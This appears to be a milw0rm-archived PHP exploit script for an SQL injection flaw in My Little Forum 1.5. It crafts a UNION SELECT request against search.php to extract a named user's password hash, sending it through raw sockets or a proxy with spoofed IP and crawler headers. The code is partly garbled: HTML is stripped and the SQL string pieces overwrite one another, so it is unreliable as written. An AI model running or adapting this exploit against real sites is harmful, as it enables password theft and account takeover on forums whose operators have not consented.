My Little Forum 1 .5 SQL Injection

a script by rgod at http://rgod.altervista.org

hostname (ex: www.siten ame.com)

path (ex: /mylf/ or just /)

specify a port other than 80 (default value)

send exploit through an HTTP proxy (ip:port)

username whom you want MD5 hash

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet,$show) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); if ($show) {echo nl2br(htmlentities($html));} } if (($path<>'') and ($host<>'') and ($username<>'')) { if ($port=='') {$port=80;} $sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw"; $sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line $sql=" FROM forum_userdata WHERE user_name='".$username."'/*"; $sql=urlencode($sql); if ($proxy=='') {$packet="GET ".$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";} else {$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";} $packet.="Client-IP: 127.0.0.1\r\n"; $packet.="X-Forwarded-For: 127.0.0.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.$path."search.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet,0); $temp=explode(';(',$html); $temp2=explode(')',$temp[1]); $hash=$temp2[0]; echo '
username: '.$username.' hash: '.$hash; # debugging... //echo htmlentities($html); } else { echo '
fill in all requested fields, optionally specify a proxy...
'; } ?> # milw0rm.com [2005-09-22]